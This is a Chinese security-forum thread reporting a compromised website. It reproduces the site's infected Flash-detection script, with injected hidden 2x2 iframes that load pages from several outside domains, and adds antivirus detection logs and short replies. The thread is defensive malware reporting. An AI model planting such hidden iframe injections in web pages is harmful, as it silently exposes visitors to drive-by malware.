http://claresbuffet.com.br/ 給力

fireold

1. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://khenpo.ru/ohcs.html?j=1070562></iframe>');
   
2. 
   
3. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gabriellerosephotography.com/emas.html?j=1070562></iframe>');
   
4. 
   
5. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://anormalbloodsugarlevels.com/ohos.html?j=1070562></iframe>');
   
6. 
   
7. //v1.7
   
8. // Flash Player Version Detection
   
9. // Detect Client Browser type
   
10. // Copyright 2005-2007 Adobe Systems Incorporated.  All rights reserved.
    
11. var isIE = (navigator.appVersion.indexOf("MSIE") != -1) ? true : false;
    
12. var isWin = (navigator.appVersion.toLowerCase().indexOf("win") != -1) ? true : false;
    
13. var isOpera = (navigator.userAgent.indexOf("Opera") != -1) ? true : false;
    
14. 
    
15. function ControlVersion() {
    
16.     var version;
    
17.     var axo;
    
18.     var e;
    
19. 
    
20.     // NOTE : new ActiveXObject(strFoo) throws an exception if strFoo isn't in the registry
    
21. 
    
22.     try {
    
23.         // version will be set for 7.X or greater players
    
24.         axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");
    
25.         version = axo.GetVariable("$version");
    
26.     } catch (e) {}
    
27. 
    
28.     if (!version) {
    
29.         try {
    
30.             // version will be set for 6.X players only
    
31.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");
    
32. 
    
33.             // installed player is some revision of 6.0
    
34.             // GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
    
35.             // so we have to be careful.
    
36. 
    
37.             // default to the first public version
    
38.             version = "WIN 6,0,21,0";
    
39. 
    
40.             // throws if AllowScripAccess does not exist (introduced in 6.0r47)         
    
41.             axo.AllowScriptAccess = "always";
    
42. 
    
43.             // safe to call for 6.0r47 or greater
    
44.             version = axo.GetVariable("$version");
    
45. 
    
46.         } catch (e) {}
    
47.     }
    
48. 
    
49.     if (!version) {
    
50.         try {
    
51.             // version will be set for 4.X or 5.X player
    
52.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
    
53.             version = axo.GetVariable("$version");
    
54.         } catch (e) {}
    
55.     }
    
56. 
    
57.     if (!version) {
    
58.         try {
    
59.             // version will be set for 3.X player
    
60.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash.3");
    
61.             version = "WIN 3,0,18,0";
    
62.         } catch (e) {}
    
63.     }
    
64. 
    
65.     if (!version) {
    
66.         try {
    
67.             // version will be set for 2.X player
    
68.             axo = new ActiveXObject("ShockwaveFlash.ShockwaveFlash");
    
69.             version = "WIN 2,0,0,11";
    
70.         } catch (e) {
    
71.             version = -1;
    
72.         }
    
73.     }
    
74. 
    
75.     return version;
    
76. }
    
77. 
    
78. // JavaScript helper required to detect Flash Player PlugIn version information
    
79. 
    
80. function GetSwfVer() {
    
81.     // NS/Opera version >= 3 check for Flash plugin in plugin array
    
82.     var flashVer = -1;
    
83. 
    
84.     if (navigator.plugins != null && navigator.plugins.length > 0) {
    
85.         if (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]) {
    
86.             var swVer2 = navigator.plugins["Shockwave Flash 2.0"] ? " 2.0" : "";
    
87.             var flashDescription = navigator.plugins["Shockwave Flash" + swVer2].description;
    
88.             var descArray = flashDescription.split(" ");
    
89.             var tempArrayMajor = descArray[2].split(".");
    
90.             var versionMajor = tempArrayMajor[0];
    
91.             var versionMinor = tempArrayMajor[1];
    
92.             var versionRevision = descArray[3];
    
93.             if (versionRevision == "") {
    
94.                 versionRevision = descArray[4];
    
95.             }
    
96.             if (versionRevision[0] == "d") {
    
97.                 versionRevision = versionRevision.substring(1);
    
98.             } else if (versionRevision[0] == "r") {
    
99.                 versionRevision = versionRevision.substring(1);
    
100.                 if (versionRevision.indexOf("d") > 0) {
     
101.                     versionRevision = versionRevision.substring(0, versionRevision.indexOf("d"));
     
102.                 }
     
103.             }
     
104.             var flashVer = versionMajor + "." + versionMinor + "." + versionRevision;
     
105.         }
     
106.     }
     
107.     // MSN/WebTV 2.6 supports Flash 4
     
108.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.6") != -1) flashVer = 4;
     
109.     // WebTV 2.5 supports Flash 3
     
110.     else if (navigator.userAgent.toLowerCase().indexOf("webtv/2.5") != -1) flashVer = 3;
     
111.     // older WebTV supports Flash 2
     
112.     else if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1) flashVer = 2;
     
113.     else if (isIE && isWin && !isOpera) {
     
114.         flashVer = ControlVersion();
     
115.     }
     
116.     return flashVer;
     
117. }
     
118. 
     
119. // When called with reqMajorVer, reqMinorVer, reqRevision returns true if that version or greater is available
     
120. 
     
121. function DetectFlashVer(reqMajorVer, reqMinorVer, reqRevision) {
     
122.     versionStr = GetSwfVer();
     
123.     if (versionStr == -1) {
     
124.         return false;
     
125.     } else if (versionStr != 0) {
     
126.         if (isIE && isWin && !isOpera) {
     
127.             // Given "WIN 2,0,0,11"
     
128.             tempArray = versionStr.split(" "); // ["WIN", "2,0,0,11"]
     
129.             tempString = tempArray[1]; // "2,0,0,11"
     
130.             versionArray = tempString.split(","); // ['2', '0', '0', '11']
     
131.         } else {
     
132.             versionArray = versionStr.split(".");
     
133.         }
     
134.         var versionMajor = versionArray[0];
     
135.         var versionMinor = versionArray[1];
     
136.         var versionRevision = versionArray[2];
     
137. 
     
138.         // is the major.revision >= requested major.revision AND the minor version >= requested minor
     
139.         if (versionMajor > parseFloat(reqMajorVer)) {
     
140.             return true;
     
141.         } else if (versionMajor == parseFloat(reqMajorVer)) {
     
142.             if (versionMinor > parseFloat(reqMinorVer)) return true;
     
143.             else if (versionMinor == parseFloat(reqMinorVer)) {
     
144.                 if (versionRevision >= parseFloat(reqRevision)) return true;
     
145.             }
     
146.         }
     
147.         return false;
     
148.     }
     
149. }
     
150. 
     
151. function AC_AddExtension(src, ext) {
     
152.     if (src.indexOf('?') != -1) return src.replace(/\?/, ext + '?');
     
153.     else return src + ext;
     
154. }
     
155. 
     
156. function AC_Generateobj(objAttrs, params, embedAttrs) {
     
157.     var str = '';
     
158.     if (isIE && isWin && !isOpera) {
     
159.         str += '<object ';
     
160.         for (var i in objAttrs) {
     
161.             str += i + '="' + objAttrs[i] + '" ';
     
162.         }
     
163.         str += '>';
     
164.         for (var i in params) {
     
165.             str += '<param name="' + i + '" value="' + params[i] + '" /> ';
     
166.         }
     
167.         str += '</object>';
     
168.     } else {
     
169.         str += '<embed ';
     
170.         for (var i in embedAttrs) {
     
171.             str += i + '="' + embedAttrs[i] + '" ';
     
172.         }
     
173.         str += '> </embed>';
     
174.     }
     
175. 
     
176.     document.write(str);
     
177. }
     
178. 
     
179. function AC_FL_RunContent() {
     
180.     var ret = AC_GetArgs(arguments, ".swf", "movie", "clsid:d27cdb6e-ae6d-11cf-96b8-444553540000", "application/x-shockwave-flash");
     
181.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
     
182. }
     
183. 
     
184. function AC_SW_RunContent() {
     
185.     var ret = AC_GetArgs(arguments, ".dcr", "src", "clsid:166B1BCA-3F9C-11CF-8075-444553540000", null);
     
186.     AC_Generateobj(ret.objAttrs, ret.params, ret.embedAttrs);
     
187. }
     
188. 
     
189. function AC_GetArgs(args, ext, srcParamName, classid, mimeType) {
     
190.     var ret = new Object();
     
191.     ret.embedAttrs = new Object();
     
192.     ret.params = new Object();
     
193.     ret.objAttrs = new Object();
     
194.     for (var i = 0; i < args.length; i = i + 2) {
     
195.         var currArg = args[i].toLowerCase();
     
196. 
     
197.         switch (currArg) {
     
198.         case "classid":
     
199.             break;
     
200.         case "pluginspage":
     
201.             ret.embedAttrs[args[i]] = args[i + 1];
     
202.             break;
     
203.         case "src":
     
204.         case "movie":
     
205.             args[i + 1] = AC_AddExtension(args[i + 1], ext);
     
206.             ret.embedAttrs["src"] = args[i + 1];
     
207.             ret.params[srcParamName] = args[i + 1];
     
208.             break;
     
209.         case "onafterupdate":
     
210.         case "onbeforeupdate":
     
211.         case "onblur":
     
212.         case "oncellchange":
     
213.         case "onclick":
     
214.         case "ondblclick":
     
215.         case "ondrag":
     
216.         case "ondragend":
     
217.         case "ondragenter":
     
218.         case "ondragleave":
     
219.         case "ondragover":
     
220.         case "ondrop":
     
221.         case "onfinish":
     
222.         case "onfocus":
     
223.         case "onhelp":
     
224.         case "onmousedown":
     
225.         case "onmouseup":
     
226.         case "onmouseover":
     
227.         case "onmousemove":
     
228.         case "onmouseout":
     
229.         case "onkeypress":
     
230.         case "onkeydown":
     
231.         case "onkeyup":
     
232.         case "onload":
     
233.         case "onlosecapture":
     
234.         case "onpropertychange":
     
235.         case "onreadystatechange":
     
236.         case "onrowsdelete":
     
237.         case "onrowenter":
     
238.         case "onrowexit":
     
239.         case "onrowsinserted":
     
240.         case "onstart":
     
241.         case "onscroll":
     
242.         case "onbeforeeditfocus":
     
243.         case "onactivate":
     
244.         case "onbeforedeactivate":
     
245.         case "ondeactivate":
     
246.         case "type":
     
247.         case "codebase":
     
248.         case "id":
     
249.             ret.objAttrs[args[i]] = args[i + 1];
     
250.             break;
     
251.         case "width":
     
252.         case "height":
     
253.         case "align":
     
254.         case "vspace":
     
255.         case "hspace":
     
256.         case "class":
     
257.         case "title":
     
258.         case "accesskey":
     
259.         case "name":
     
260.         case "tabindex":
     
261.             ret.embedAttrs[args[i]] = ret.objAttrs[args[i]] = args[i + 1];
     
262.             break;
     
263.         default:
     
264.             ret.embedAttrs[args[i]] = ret.params[args[i]] = args[i + 1];
     
265.         }
     
266.     }
     
267.     ret.objAttrs["classid"] = classid;
     
268.     if (mimeType) ret.embedAttrs["type"] = mimeType;
     
269.     return ret;
     
270. }
     
271. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://salvadorpostigo.com/hzws.html></iframe>');

复制代码

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
   
2. width=2 src=http://anormalbloodsugarlevels.com/ohos.html?j=1070562>
   
3. </iframe>

复制代码

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
   
2. width=2 src=http://gabriellerosephotography.com/emas.html?j=1070562>
   
3. </iframe>

复制代码

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
   
2. width=2 src=http://khenpo.ru/ohcs.html?j=1070562>
   
3. </iframe>

复制代码

1. <iframe name=Twitter scrolling=auto frameborder=no align=center height=2
   
2. width=2 src=http://salvadorpostigo.com/hzws.html>
   
3. </iframe>

复制代码

Avira

2013/7/14 下午 07:03 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js'
      包含病毒或有害的程式 'HTML/TwitScroll.B' [virus]
      已採取動作：
      檔案會移動至 '57d21a75.qua' 名稱底下的隔離區目錄。.

2013/7/14 下午 07:03 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        795
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/14 下午 07:03 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm'
      包含病毒或有害的程式 'HTML/Infected.WebPage.Gen3' [virus]
      已採取動作：
      檔案會移動至 '543e1578.qua' 名稱底下的隔離區目錄。.

2013/7/14 下午 07:03 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        795
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：傳輸至掃描程式

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'HTML/TwitScroll.B [virus]'
      執行的動作：拒絕存取

2013/7/14 下午 07:02 [Web Protection] 發現惡意程式碼
      從 URL "http://claresbuffet.com.br/AC_RunActiveContent.js" 存取資料時，
      發現病毒或有害的程式 'HTML/TwitScroll.B' [virus]。
      已採取動作：已略過

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm 中
      偵測到病毒或有害的程式 'HTML/Infected.WebPage.Gen3 [virus]'
      執行的動作：傳輸至掃描程式

2013/7/14 下午 07:02 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\81REZ51I\claresbuffet_com_br[1].htm 中
      偵測到病毒或有害的程式 'HTML/Infected.WebPage.Gen3 [virus]'
      執行的動作：拒絕存取

2013/7/14 下午 07:02 [Web Protection] 發現惡意程式碼
      從 URL "http://claresbuffet.com.br/" 存取資料時，
      發現病毒或有害的程式 'HTML/Infected.WebPage.Gen3' [virus]。
      已採取動作：已略過

哀酱俏佳人

好长

fireold

哀酱俏佳人 发表于 2013-7-14 19:11
好长

的確太長了

会飞的猫

哀酱俏佳人 发表于 2013-7-14 19:11
好长

想知道这毒网的代码是怎么解密出来的
另外“哀酱”说的是灰原吧

哀酱俏佳人

会飞的猫 发表于 2013-7-14 23:04
想知道这毒网的代码是怎么解密出来的
另外“哀酱”说的是灰原吧

灰原哀嘛，用工具吖，看看应用区屁颠的帖子